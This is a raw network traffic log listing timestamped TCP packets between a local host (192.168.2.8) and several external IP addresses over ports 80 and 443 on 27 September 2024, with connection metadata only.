Sep 27, 2024 01:49:56.477180004 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477194071 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477207899 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477212906 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477224112 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477241039 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477243900 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477257967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477297068 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477401018 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477453947 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477468967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477483988 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477556944 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477579117 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477611065 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477617979 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477627039 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477642059 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477643013 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477668047 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477683067 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477698088 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477718115 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477739096 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477755070 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477758884 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477758884 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477758884 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477781057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477783918 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477801085 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477837086 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477852106 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477870941 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477905989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477924109 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477937937 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.477942944 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477957964 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477972031 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477987051 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.477989912 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.478003025 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.478012085 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.478028059 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.478043079 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.478060007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.478079081 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.478682995 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.484101057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484191895 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484206915 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484226942 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484241009 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484256029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484270096 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484286070 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.484333992 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.484337091 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484380960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484405994 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484421968 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484436989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484457970 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.484472036 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484488010 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484503984 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484523058 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484536886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484560966 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.484560966 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.484560966 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.484574080 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484589100 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484632015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484647036 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484663010 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484677076 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484680891 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.484692097 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484710932 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484725952 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.484730005 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.484798908 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.484914064 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485018015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485033035 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485043049 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485048056 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485064983 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485080957 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485083103 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485097885 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485137939 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485141039 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485155106 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485188961 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485213041 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485228062 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485232115 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485232115 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485243082 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485265970 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485265970 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485271931 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485292912 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485308886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485322952 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485342979 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485373020 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485388041 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485403061 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485418081 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485424995 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485424995 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485433102 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485449076 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485450029 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485464096 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485480070 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485492945 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485507965 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485522985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485538006 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485552073 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.485579967 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485579967 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485579967 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485579967 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.485579967 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.488425016 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.570671082 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570703983 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570729017 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570744991 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570780039 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570795059 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570811987 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570827007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570842028 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570856094 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570871115 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570875883 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.570875883 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.570877075 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.570877075 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.570909023 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.570928097 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570941925 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570955992 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570971012 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.570986032 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571002007 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571011066 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.571017981 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571033001 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571048021 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571098089 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.571098089 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.571162939 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571178913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571193933 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571218014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571233988 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571238041 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.571249962 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571249962 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.571266890 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571280003 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.571281910 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571297884 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571312904 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571327925 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571342945 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571350098 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.571350098 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.571358919 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571373940 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.571389914 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.571412086 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.571921110 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.763631105 CEST	443	49746	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:56.763724089 CEST	49746	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:56.801340103 CEST	49746	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:56.801357985 CEST	443	49746	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:56.802428961 CEST	443	49746	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:56.803785086 CEST	49746	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:56.803800106 CEST	49746	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:56.803980112 CEST	443	49746	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:56.879508972 CEST	443	49745	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:56.879571915 CEST	49745	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:56.879595995 CEST	443	49745	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:56.879616022 CEST	443	49745	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:56.879693985 CEST	49745	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:56.879693985 CEST	49745	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:56.879842043 CEST	49745	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:56.879859924 CEST	443	49745	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:56.917390108 CEST	49747	80	192.168.2.8	45.132.206.251
Sep 27, 2024 01:49:56.922240973 CEST	80	49747	45.132.206.251	192.168.2.8
Sep 27, 2024 01:49:56.922314882 CEST	49747	80	192.168.2.8	45.132.206.251
Sep 27, 2024 01:49:56.922441006 CEST	49747	80	192.168.2.8	45.132.206.251
Sep 27, 2024 01:49:56.922492027 CEST	49747	80	192.168.2.8	45.132.206.251
Sep 27, 2024 01:49:56.927373886 CEST	80	49747	45.132.206.251	192.168.2.8
Sep 27, 2024 01:49:56.927426100 CEST	80	49747	45.132.206.251	192.168.2.8
Sep 27, 2024 01:49:56.927457094 CEST	80	49747	45.132.206.251	192.168.2.8
Sep 27, 2024 01:49:56.927469969 CEST	80	49747	45.132.206.251	192.168.2.8
Sep 27, 2024 01:49:57.208340883 CEST	443	49746	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:57.208585978 CEST	443	49746	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:57.208643913 CEST	49746	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:57.208703995 CEST	49746	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:57.208715916 CEST	443	49746	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:57.208753109 CEST	49746	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:57.208758116 CEST	443	49746	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:57.224205017 CEST	49748	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:57.224248886 CEST	443	49748	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:57.224320889 CEST	49748	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:57.224649906 CEST	49748	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:57.224663973 CEST	443	49748	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:57.712950945 CEST	443	49748	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:57.713031054 CEST	49748	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:57.715544939 CEST	49748	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:57.715570927 CEST	443	49748	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:57.715945005 CEST	443	49748	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:57.717441082 CEST	49748	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:57.717462063 CEST	49748	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:57.717519999 CEST	443	49748	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:57.777582884 CEST	80	49747	45.132.206.251	192.168.2.8
Sep 27, 2024 01:49:57.777652025 CEST	49747	80	192.168.2.8	45.132.206.251
Sep 27, 2024 01:49:58.147615910 CEST	443	49748	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:58.147851944 CEST	443	49748	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:58.148240089 CEST	49748	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:58.148379087 CEST	49748	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:58.148412943 CEST	443	49748	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:58.148430109 CEST	49748	443	192.168.2.8	188.114.97.3
Sep 27, 2024 01:49:58.148439884 CEST	443	49748	188.114.97.3	192.168.2.8
Sep 27, 2024 01:49:58.162615061 CEST	49749	443	192.168.2.8	104.21.77.130
Sep 27, 2024 01:49:58.162692070 CEST	443	49749	104.21.77.130	192.168.2.8
Sep 27, 2024 01:49:58.164352894 CEST	49749	443	192.168.2.8	104.21.77.130
Sep 27, 2024 01:49:58.164813995 CEST	49749	443	192.168.2.8	104.21.77.130
Sep 27, 2024 01:49:58.164834976 CEST	443	49749	104.21.77.130	192.168.2.8
Sep 27, 2024 01:49:58.665132046 CEST	443	49749	104.21.77.130	192.168.2.8
Sep 27, 2024 01:49:58.665196896 CEST	49749	443	192.168.2.8	104.21.77.130
Sep 27, 2024 01:49:58.667378902 CEST	49749	443	192.168.2.8	104.21.77.130
Sep 27, 2024 01:49:58.667401075 CEST	443	49749	104.21.77.130	192.168.2.8
Sep 27, 2024 01:49:58.667727947 CEST	443	49749	104.21.77.130	192.168.2.8
Sep 27, 2024 01:49:58.668900967 CEST	49749	443	192.168.2.8	104.21.77.130
Sep 27, 2024 01:49:58.668926954 CEST	49749	443	192.168.2.8	104.21.77.130
Sep 27, 2024 01:49:58.668996096 CEST	443	49749	104.21.77.130	192.168.2.8
Sep 27, 2024 01:49:59.225563049 CEST	443	49749	104.21.77.130	192.168.2.8
Sep 27, 2024 01:49:59.225764036 CEST	443	49749	104.21.77.130	192.168.2.8
Sep 27, 2024 01:49:59.225861073 CEST	49749	443	192.168.2.8	104.21.77.130
Sep 27, 2024 01:49:59.453706980 CEST	49749	443	192.168.2.8	104.21.77.130
Sep 27, 2024 01:49:59.453732967 CEST	443	49749	104.21.77.130	192.168.2.8
Sep 27, 2024 01:49:59.453747988 CEST	49749	443	192.168.2.8	104.21.77.130
Sep 27, 2024 01:49:59.453754902 CEST	443	49749	104.21.77.130	192.168.2.8
Sep 27, 2024 01:49:59.581800938 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:59.581864119 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:49:59.581935883 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:59.583048105 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:49:59.583070040 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.239327908 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.239411116 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.243380070 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.243410110 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.243727922 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.245173931 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.291403055 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.742609978 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.742640018 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.742664099 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.742672920 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.742705107 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.742722034 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.742722034 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.742754936 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.840867043 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.840897083 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.840938091 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.840964079 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.840985060 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.841001987 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.848227978 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.848289967 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.848306894 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.848331928 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.848347902 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.848377943 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.850873947 CEST	49750	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:00.850893021 CEST	443	49750	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:00.867912054 CEST	49752	443	192.168.2.8	104.21.2.13
Sep 27, 2024 01:50:00.867943048 CEST	443	49752	104.21.2.13	192.168.2.8
Sep 27, 2024 01:50:00.868019104 CEST	49752	443	192.168.2.8	104.21.2.13
Sep 27, 2024 01:50:00.868849993 CEST	49752	443	192.168.2.8	104.21.2.13
Sep 27, 2024 01:50:00.868861914 CEST	443	49752	104.21.2.13	192.168.2.8
Sep 27, 2024 01:50:01.357162952 CEST	443	49752	104.21.2.13	192.168.2.8
Sep 27, 2024 01:50:01.357227087 CEST	49752	443	192.168.2.8	104.21.2.13
Sep 27, 2024 01:50:01.400171041 CEST	49752	443	192.168.2.8	104.21.2.13
Sep 27, 2024 01:50:01.400182962 CEST	443	49752	104.21.2.13	192.168.2.8
Sep 27, 2024 01:50:01.400640011 CEST	443	49752	104.21.2.13	192.168.2.8
Sep 27, 2024 01:50:01.403091908 CEST	49752	443	192.168.2.8	104.21.2.13
Sep 27, 2024 01:50:01.403120041 CEST	49752	443	192.168.2.8	104.21.2.13
Sep 27, 2024 01:50:01.403175116 CEST	443	49752	104.21.2.13	192.168.2.8
Sep 27, 2024 01:50:01.807915926 CEST	443	49752	104.21.2.13	192.168.2.8
Sep 27, 2024 01:50:01.808058977 CEST	443	49752	104.21.2.13	192.168.2.8
Sep 27, 2024 01:50:01.808137894 CEST	49752	443	192.168.2.8	104.21.2.13
Sep 27, 2024 01:50:01.817245960 CEST	49752	443	192.168.2.8	104.21.2.13
Sep 27, 2024 01:50:01.817260981 CEST	443	49752	104.21.2.13	192.168.2.8
Sep 27, 2024 01:50:01.817286968 CEST	49752	443	192.168.2.8	104.21.2.13
Sep 27, 2024 01:50:01.817293882 CEST	443	49752	104.21.2.13	192.168.2.8
Sep 27, 2024 01:50:14.871000051 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:50:14.872201920 CEST	49747	80	192.168.2.8	45.132.206.251
Sep 27, 2024 01:50:23.598545074 CEST	49755	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:23.598654032 CEST	443	49755	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:23.598740101 CEST	49755	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:23.602435112 CEST	49755	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:23.602471113 CEST	443	49755	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:24.250292063 CEST	443	49755	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:24.250461102 CEST	49755	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:24.325572014 CEST	49755	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:24.325624943 CEST	443	49755	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:24.325930119 CEST	443	49755	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:24.326004982 CEST	49755	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:24.327799082 CEST	49755	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:24.371407986 CEST	443	49755	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:24.767874002 CEST	443	49755	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:24.767909050 CEST	443	49755	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:24.767925978 CEST	443	49755	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:24.768014908 CEST	49755	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:24.768039942 CEST	443	49755	104.102.49.254	192.168.2.8
Sep 27, 2024 01:50:24.768083096 CEST	49755	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:24.768115997 CEST	49755	443	192.168.2.8	104.102.49.254
Sep 27, 2024 01:50:24.869195938 CEST	443	49755	104.102.49.254	192.168.2.8
